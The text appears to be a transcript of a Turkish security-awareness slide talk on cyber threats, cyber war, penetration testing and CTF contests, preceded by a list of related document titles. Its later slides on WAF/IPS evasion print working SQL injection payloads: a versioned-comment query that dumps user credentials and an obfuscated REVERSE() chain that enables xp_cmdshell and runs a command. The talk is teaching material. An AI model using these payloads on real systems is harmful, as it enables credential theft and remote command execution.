Siber Tehditler, Savunma Yöntemleri ve Hackerların Başarısı. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ honal@bga.com.tr www.bga.com.

Benzer belgeler
Siber Tehditler ve Savunma Yöntemleri. Ozan UÇAR Certified Ethical Hacker

Web Uygulama Açıklıkları ve Saldırı Engelleme Sistemleri Web uygulama açıklıkları karşısında saldırı engelleme sistemlerinin yetersizliği

Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

Malware Analizi Yöntem ve Araçları. Huzeyfe ÖNAL Bilgi Güvenliği

Güvenlik Sistemlerini Atlatma ve Alınacak Dersler. Huzeyfe ÖNAL

İstemci Tabanlı Saldırı Türleri. Ozan UÇAR

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Uluslararası İlişkilerde Güvenlik Çalışmaları Bahar 2018 X. Güncel Uluslararası Güvenlik Sorunları - I Siber Güvenlik

Web Uygulama Güven(siz)liği 2.0

Bilgi Güvenliği AKADEMİSİ Eği3m Dosyası

Sunum İçeriği. 1. Siber Savaş (Siber Terör) 2. Siber Savunma 3. USOM

Siber Güvenlik Basın Buluşması. C.Müjdat Altay 15 Haziran 2015

Bilgi Güvenliği Eğitim/Öğretimi

Ülkelerin Siber Savaş Kabiliyetleri. SG 507 Siber Savaşlar Güz 2014 Yrd. Doç. Dr. Ferhat Dikbıyık

KAMU SİBER GÜVENLİK GÜNÜNE HOŞGELDİNİZ

Venatron Enterprise Security Services W: P: M:

Güvenlik Mühendisliği

BİLGİ GÜVENLİĞİ FARKINDALIK EĞİTİMİ NASIL OLMALI? 28/04/2015 SUNA KÜÇÜKÇINAR İBRAHİM ÇALIŞIR / 9. ULAKNET ÇALIŞTAYI 2015 KUŞADASI - AYDIN 1

SIZMA TESTİ, EĞİTİM VE DANIŞMANLIK HİZMETİ VEREN PERSONEL VE FİRMALAR İÇİN YETKİLENDİRME PROGRAMI

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

DDoS Saldırıları ve Korunma Yolları. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

Siber Saldırı Aracı Olarak DDoS. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

Enerji, bankacılık, finans, telekomünikasyon gibi önemli sektörler Sinara Labs ile siber saldırılar a karşı güvende

Güvenlik Duvarı ve İçerik Filtreleme Sistemlerini Atlatma Yöntemleri. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

Bilgi Güvenliği. Kurumsal Eğitim Kataloğu Siber Güvenlik Farkındalığı

TÜPRAŞ'ta Siber Güvenlik ve Proses Emniyeti Eylül 2018

anka Siber Güvenlik Analiz Sistemleri Geleceğe Güven Tesis Eder

Siber Savaş ve Terörizm Dr. Muhammet Baykara

NGN ve VoIP Ağları Güvenlik Denetimi

KKB Kredi Kayıt Bürosu


Hakkında ARGE SECOPS EĞİTİM MSSP SOME / SOC PENTEST. BGA Bilgi Güvenliği A.Ş.

TÜRK STANDARDLARI ENSTİTÜSÜ BİLİŞİM TEKNOLOJİLERİ TEST VE BELGELENDİRME DAİRESİ BAŞKANLIĞI SIZMA TESTİ UZMANI FAALİYETLERİ

SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO :

SIZMA TESTİ EĞİTİMLERİ

HATAY KHB BILGI İŞLEM BİRİMİ

Firewall/IPS Güvenlik Testleri Eğitimi

SOC unuz siber saldırılara hazır mı?

ULUSAL BİLGİ SİSTEMLERİSTEMLERİ GÜVENLİK PROGRAMI

Bilgi ve Bilgisayar Sistemleri Güvenliği (Information and Computer Systems Security)

Siber Güvenlik Ülkemizde Neler Oluyor?

Siber Güvenlik Risklerinin Tanımlanması / Siber Güvenlik Yönetişimi

BİLGİSAYAR VE AĞ GÜVENLİĞİ

Siber Güvenlik İş Gücü

Çocuklar ve Ebeveynler için İnternet Güvenliği

Siber Savunma. SG 507Siber Savaşlar Güz 2014 Yrd. Doç. Dr. Ferhat Dikbıyık

Yeni Nesil Güvenlik Duvarlarında Olması Beklenen Özellikler ve Uygulama Bazlı Filtreleme

Linux Temelli Zararlı Yazılımların Bulaşma Teknikleri, Engellenmesi ve Temizlenmesi

KURUM AĞLARINI ÖNEMLĠ ZARARLI YAZILIM SALDIRILARINDAN KORUMA. Osman PAMUK

TBD Aralık

BASKI GÜVENLİĞİ ZORUNLULUĞU

Alparslan KULOĞLU. Pazarlama ve İş Geliştirme Direktörü BEWARE SİBER TEHDİTLERE BE AWARE HAZIR MIYIZ? 1/19

Gelişmiş Siber Tehdidler (APT): Genel Bakış

Bilgi Güvenliği Hizmetleri Siber güvenliği ciddiye alın!

Elektrik Altyapılarında Bilgi Güvenliği Riskleri ve Çözümler

BİLGİ GÜVENLİĞİ VE FARKINDALIK WEB SİTESİ KULLANIM KILAVUZU

Mobil Güvenlik ve Denetim

(Bilgisayar ağlarının birbirine bağlanarak büyük bir ağ oluşturmasıdır)

Bugün. Ülke Güvenlik Analizi (DDoS, Botnetler, Spam vs.) Sosyal Ağ Güvenliği Büyük Veri ve Bulut Güvenliği. Siber Güvenlik ve Farkındalık Eğitimi

/pikalite / bilgipi /pikalite EĞİTİM HİZMETLERİMİZ

Veritabanı Güvenliği ve Savunma Algoritmaları

SİBER GÜVENLİK FARKINDALIĞI

UE.18 Rev.Tar/No: /03 SAYFA 1 / 5

Finansal Hizmetler Sektöründe Güvenlik Trendleri Türkiye ve Dünyadaki Son Çalışmalar. Cüneyt Kırlar Kurumsal Risk Hizmetleri Lideri

GELİŞMİŞ SİBER SİLAHLAR VE TESPİT YÖNTEMLERİ. Bahtiyar BİRCAN Uzman Araştırmacı Siber Güvenlik Enstitüsü

Finans Sektörüne Yönelik Yeni Nesil Tehditler. Burç Yıldırım Mart 2015

aselsan Güvenli Bilgi Paylaşımı ve SAHAB aselsan Ali YAZICI Türk Silahlı Kuvvetlerini Güçlendirme Vakfı nın bir AZERBAYCAN-Temmuz kuruluşudur.

Geleceğin güçlü Türkiye'si için Türkiye'nin Geleceğine Öneriler

BİLGİ GÜVENLİĞİ. Bu bolümde;


Saldırgan Bakış Açısı ile Değer Yaratmak

Siber Dünyada İzleme ve Takip. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ Twitter:

BİLİŞİM SUÇLARI Hazırlayan: Okt. Dr. Ebru SOLMAZ

VERİ GÜVENLİĞİ. Özer Çelik Matematik-Bilgisayar Bölümü

AĞ ve SİSTEM GÜVENLİĞİ

RSA. Güvenlikte Büyük Veri Yaklaşımları, Teknolojiler ve Operasyon Modeli. Vedat Finz. Copyright 2012 EMC Corporation. All rights reserved.


ENDÜSTRİYEL KONTROL SİSTEMLERİNDE BİLİŞİM GÜVENLİĞİ YÖNETMELİĞİ NE İLİŞKİN HİZMETLER

BİLGİ GÜVENLİĞİ. İsmail BEZİRGANOĞLU İdari ve Mali İşler Müdürü Türkeli Devlet Hastanesi

Ajanda. Siber Tehditler Etkiler Karşılaşılan Zorluklar Çözüm Kaynakları

ALT BAŞLIKLAR DİPLOMASİ. -Sosyal Medya ve Diplomasi. -Kamu Diplomasisinin Gelişimi. - Diplomasinin 11 Eylülü : Wikileaks. -Önleyici Diplomasi

SİBER SAVAŞLAR RAUND 1 STUXNET

Sibergüvenlik Faaliyetleri

Hosting Firmalarına yönelik DDoS Saldırıları ve Çözüm Önerileri. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ


Akıllı Şebekede Siber Güvenlik Standardizasyonu

Bilişim Teknolojileri

Hedef Odaklı Sızma Testleri

Daha Güçlü Türkiye için Etkin SOME ler Nasıl Olmalı?

BİLGİSAYAR BİLİMLERİ ARAŞTIRMA VE UYGULAMA MERKEZİ BİLGİ GÜVENLİĞİ

SEÇKİN ONUR. Doküman No: Rev.Tarihi Yayın Tarihi Revizyon No 01 OGP 09 SEÇKİN ONUR BİLGİ GÜVENLİĞİ POLİTİKASI

Bilgi Güvenliği Farkındalık Eğitimi

GLOBAL SİBER ATAK GÖRSELLEŞTİRME SİSTEMLERİ

Siber Güvenlikte Neler Oluyor? Hasan H. SUBAŞI KAMU SİBER GÜVENLİK DERNEĞİ GENEL SEKRETER

T.C. TORBALI BELEDİYESİ BİLGİ İŞLEM MÜDÜRLÜĞÜ TEŞKİLAT YAPISI VE ÇALIŞMA ESASLARINA DAİR YÖNERGE

Bilgisayar Güvenliği Etik ve Gizlilik

Yöneticiler için Bilgi Güvenliği

Siber Güvenliğe İlişkin Temel Bilgiler

Transkript:

Siber Tehditler, Savunma Yöntemleri ve Hackerların Başarısı Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ honal@bga.com.tr www.bga.com.tr

Konuşmacı Hakkında Huzeyfe ÖNAL Bilgi Güvenliği Danışmanı (iş hayatı) Bilgi Güvenliği AKADEMİSİ(www.bga.com.tr) Ağ Güvenliği Araştırmacısı (gerçek hayat) Blogger www.lifeoverip.net Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 2

Genel Terim ve Kavramlar Siber savaş(cyber warfare), siber tehditler, siber suç(cyber crime), cyber espionage, cyber intelligence, siber sabotaj(cyber sabotage), siber terörizm (Cyberterrorism), siber casusluk (Cyber spying), siber silah (cyber o weapon), sızma testleri (penetration test), siber güvenlik yarışmaları(ctf -Capture The Flag)

Teknolojinin Yaşam Döngüsü Teknolojiyi Araştır Güvenliğini Sağla Teknolojiyi Al Teknolojiyi Kullan Teknolojiyi Öğren

Obama dan İnciler... So cyberspace is real. And so are the risks that come with it. In short, America's economic prosperity in the 21st century will depend on cybersecurity. it's now clear this cyber threat is one of the most serious economic and national security challenges we face as a nation. And finally, we will begin a national campaign to promote cybersecurity awareness

Siber Hayat Siber tanımı: Altyapısı bilişim sistemleri olan ve gerçek hayatın gölgesi niteliğindeki yaşam. Alışveriş, oyun, film, müzik, ticaret, yemek, komşuluk, istihbarı bilgi toplama vs gibi gerçek hayatın vazgeçilmez işleri siber hayatta da benzeri isimlerle yer almaktadır. Halk içinde sanal dünya olarak da bilinir.

Siber Güvenlik Siber hayatın güvenliği(gizlilik, bütünlük ve erişilebilirlik) sağlanması amacıyla gerçekleştirilen faaliyetlerin tümü. Bilgi güvenliğinden farkı: daha soyut ve geniş bir alanı kapsaması Bilgi güvenliği teknik, siber güvenlik sosyal bir tanımdır. ~2015 li yıllarda en sık kullanılacak tanımlardan.

Siber Güvenlik Gerçek Dünyayı nasıl Wikileaks... Etkiler? Ortadoğuda devlet başkanlarının son durumu Türkiye de kaset mevzuları Siber dünyanın sağladığı sınırsız özgürlük(?) sayesinde kişilerin özel yaşam kavramı kalmayacaktır 22 Ağustos da Türkiye internetinde gerçekleştirilecek kısıtlamalar Artık tüm internet kullanıcıları belirli profil seçerek internete bağlanacak ve izlenebilecek!

Güncel Durum Siber hayat kavramının yerleşmesi. Siber güvenlik, siber savaş, siber ordu tanımlarının konuşulmaya başlanması. Yerli güvenlik yazılımlarının geliştirilmeye başlanması(yerli üretim %0,1 seviyelerinde) Temel eksiklik: bilgi güvenliği farkındalığı, teknik konularda çalışanların temel bilgi eksikliği. Siber güvenliğin lüks değil, gereksinim olduğu fikrinin yaygınlaşması. Siber Güvenlik Derneği kurulumu.(2011)

Siber Tehditler Bilgi güvenliğini ihlal edecek tüm faaliyetler DDoS saldırıları: internet üzerinden sistemlerin erişilebilir olmasını engelleme Hacking aktiviteleri Bilgi sızdırma faaliyetleri RSA Sony PS ağı üyelerinin bilgilerinin sızması Prestij zarar verme faaliyetleri

Siber Savaş Bilişim sistemleri kullanılarak gerçekleştirilen ve amacı bir şirkete, bir ülkeye veya bir gruba yönelik maddi, manevi zararlar verme olan faaliyetler. 2007 Estonya örneği: DDoS saldırılarıyla ülkenin internet sisteminin işlemez hale getirilmesi 2010 Türkiye örneği: Yotube yasağını protesto eden bir grup Hacker Çeşitli bakanlık sitelerine yönelik DDoS saldırıları gerçekleştirdi. 2011 Türkiye örneği: Anonymous grubunun 22 Ağustos u protesto eden saldırıları Etkilenen kurumlar?

Siber Savaş Tarafları Hacker grupları Ticari markalar, ticari firmalar Devletler Muhalif gruplar

Siber Ordu Ülkeyi, kurumu siber dünyadan gelebilecek tehlikelere karşı koruyacak ve gerektiğinde siber saldırılar gerçekleştirebilecek yetenekteki bilgi güvenliği uzmanlarının Siber ordu mensubu tüm askerler hem saldırı hem de koruma yöntemlerini çok iyi bilmek zorundadırlar. İki tür siber ordu bulunmaktadır: Devlet eliyle yetiştirilen resmi birimler Gönüllü fakat resmi ayağı olmayan birimler

Dünyadaki Siber Ordular İlk siber ordu Amerika Birleşik Devletleri tarafından gizli olarak kurulmuştur. Bu konuda en önemli yatırımlardan biri K.Kore dir. Türkiye de henüz bilinen düzenli bir siber ordu yoktur. Bazı ülkelerde gönüllü, siber ordular bulunmaktadır. 2010 yılında birçok ülke siber ordu konusunu gündemine almıştır.

Cyber spying Çeşitli hacking yöntemleri kullanılarak hedef şirket/kurum/devletten bilgi sızdırmak Özellikle istihbarat teşkilatlarının sık başvurduğu yöntemlerden biridir. İstihbarat teşkilatları güvenlik sistemlerine yakalanmayacak malware, virüs geliştirme konusunda ciddi yatırımlar gerçekleştirmektedir. Bunun en iyi örneği İran da yaşanan Stuxnet adı verilen ve doğrudan SCADA sistemlere yönelik aksiyon alan kötücül yazılımdır.

Cyber weapon Klasik dünyadaki silah kavramından farklı olarak siber silah sadece yoketme amacı taşımamaktadır. Yeri geldiğinde yoketme, yeri geldiğinde iz silme ve yeri geldiğinde hedef sistemlerden bilgi kaçırma amaçlı kullanılacak yöntem ve araçlardır. Stuxnet en güncel ve ideal siber silah örneğidir.

Siber Casus Siber casuslar siber ordu elemanlarıdır En az 3 yıl süren özel eğitimlerden geçirilerek bilgi güvenliğine ait tüm konuları bilen ve 3 konuda ileri seviye uzman olan kişilere verilen lakaptır. Bu kişilerin görevleri bilişim sistemlerini kullanarak bilgi sızdırmaktır. Görevleri genellikle teknoloji şirketlerinde bilgisayarla ilgili herhangi bir alandır

Ülkelerin siber güvenlik stratejileri Siber güvenlik konusunda alınacak stratehjiler doğrudan o ülkenin gelişmişliğiyle alakalıdır Siber güvenlik demek teknolojiden daha fazla faydalanılıyor demek ve daha fazla korunma ihtiyacı duyuluyor demektir. 2008-2011 yılları arasında çoğu gelişmiş ülke siber güvenlik stratejilerini açıklamış ve yürürlüğe koymuştur. Türkiye de henüz kabul edilen bir siber güvenlik stratejisi yoktur Kırmızı kitaba eklenen üç satır hariç

Ülkelerin siber güvenlik stratejileri Canada Cyber Security Strategy http://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scceng.pdf ESTONIA Cyber Security Strategy http://www.mod.gov.ee/files/kmin/img/files/kuberjulg eoleku_strateegia_2008-2013_eng.pdf Cyber Security Strategy for Germany http://www.bmi.bund.de/shareddocs/downloads/de/ Themen/OED_Verwaltung/Informationsgesellschaft/cy ber_eng.pdf? blob=publicationfile

Ülkelerin siber güvenlik stratejileri Cyber Security Strategy of the United Kingdom http://www.computerweekly.com/blogs/read-allaboutit/cabinet%20office%20cybersecurity%20review%2009.pdf Australian Government Cyber SeCurity Strategy http://www.ema.gov.au/www/agd/rwpattach.nsf/vap/ (4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+ Security+Strategy+- +for+website.pdf/$file/ag+cyber+security+strategy+- +for+website.pdf

Penetration test Sistemlerin güvenliğini test ettirmek amacıyla gerçekleştirilen ve hackerların kullandıkları yöntemleri kullanan beyaz şapkalıların gözüyle sistem açıklıklarının aranması Whitebox pentest Blackbox pentest Olmak üzere temelde ikiye ayrılır. Ciddi teknik altyapı gerektiren bir prosestir.

CTF -Capture The Flag Bilgi güvenliği uzmanlarının offensive security konuları hakkında bilgi sahibi olmaları ve pratik yapmaları için geliştirilmiş bir oyun türüdür. Genellikle red team(saldırgan) ve blue team olmak üzere ikiye ayrılırlar Red team hedefleri ele geçirmeye, blue team de hedefleri savunmaya yönelik çabalar. Ve oyun boyunca her iki taraf da pratik olarak bilgilerini kullanma ve test etme şansı yakamış olur.

II. Bölüm Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 23

Tümden savunma! Klasik Güvenlik Anlayışı Ürün temelli bir güvenlik anlayışı Ürün= sihirbaz bakış açısı(bilgi-sayar) Türkiye ye özel değil tüm dünya için geçerli Teknik sorunlar teknik yollarla çözülür, insani sorunlar insanla çözülür Temel bilgi sahibi olmadan ileri seviye işler yapmaya çalışma TCP/IP bilmeden Firewall/IPS yönetmek Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 24

Uygulama Güvenliği Nedir? Yazılım geliştiriciler en kısa sürede ortaya ürün çıkarma peşindeler. Guvenlik uzmanları yoğunlukla altyapı güvenliğine yönelmişlerdir Uygulama Güvenliği: Üretilen yazılımın fonksiyonlarını yitirmeden güvenli bir şekilde geliştirilmesini sağlama. Uygulama Güvenliği Yazılım Geliştirme IT Güvenlik 25

Neden Uygulama Güvenliği Hacking Stage 6 Wikipedia, Feb 9 2007 Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 26

Neden Uygulama Güvenliği, devam Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 27

Güvenlik Dünyasının Gidişatı Firewall IDS/IPS WAF

Hacker larin Gidişatı Client insecurity Mobile insecurity Social Networks/Eng.

Hacker / güvenlik uzmanı Güvenlik uzmanları prosedürel hareket ettiği için hackerlara göre bir adım geriden gelir. Güvenlik uzmanları için koruma bir meslek, hackerlar için bu korumaları aşmak bir zevktir. Hacker için bilgi güvenliği diye bir kavram yoktur, sadece aşılması gereken engel vardır! Hackerların mesaisi, sayısı ve motivasyonu farklıdır... Siber dünyada gece gündüz kavramları yoktur 7/24 mesai yaparlar! Örnek: Wordpress açıklığı

Bakış Açısı

SMS ile kaos oluşturma!

HTTPS Üzerinden Free Internet Bazı durumlarda HTTPS portu üzerinde hiç erişim kontrolü olmayabilir

SQL Yorumları ile IPS Atlatma /* comment */ yorum satırı olarak algılanır(sql +WAF+IPS tarafından) /*!sql-code*/ ve /*!12345sql-code*/ yorum olarak algılanmaz(sql tarafından)(waf+ips ler tarafından yorum olarak algılanır) /?id=1/*!limit+0+union+select+concat_ws(0x3a,us ername,password,email)+from+users*/ Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 34

Encoding Kullanarak IPS Atlatma Inline çalışan WAF/IPS lerde işe yarar Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 35

SQL Reverse Fonksiyonu ile IPS Atlatma SQL Sunucularda bulunan reverse fonksiyonu kullanılır Reverse(lqs) = sql var=1';declare @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE(' 08.911.39.19 gnip" llehsdmc_px') EXEC (@c);-- REVERSE(' 08.911.39.19 gnip" llehsdmc_px')= ping 91.93.119.80 Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 36

123456 123456789 0 111111 123123 14531453 1234567 123654 19861986 12345678 666666 Parola Profilimiz

NetSec Ağ Ve Bilgi Güvenliği Topluluğu Türkiye nin en geniş katılımlı bilgi güvenliği e-posta listesi ve topluluğu ~1200 üye Ücretsiz üye olabilirsiniz. Güvenlik dünyasında yayınlanan önemli haberler, güvenlik yamaları ve birçok teknik konuda tartışma... Üyelik için http://www.lifeoverip.net/netsec-listesi/ Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 38

Sorular? Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 39

Bilgi Güvenliği AKADEMİSİ Bilgi Güvenliği AKADEMİSİ www.bga.com.tr 40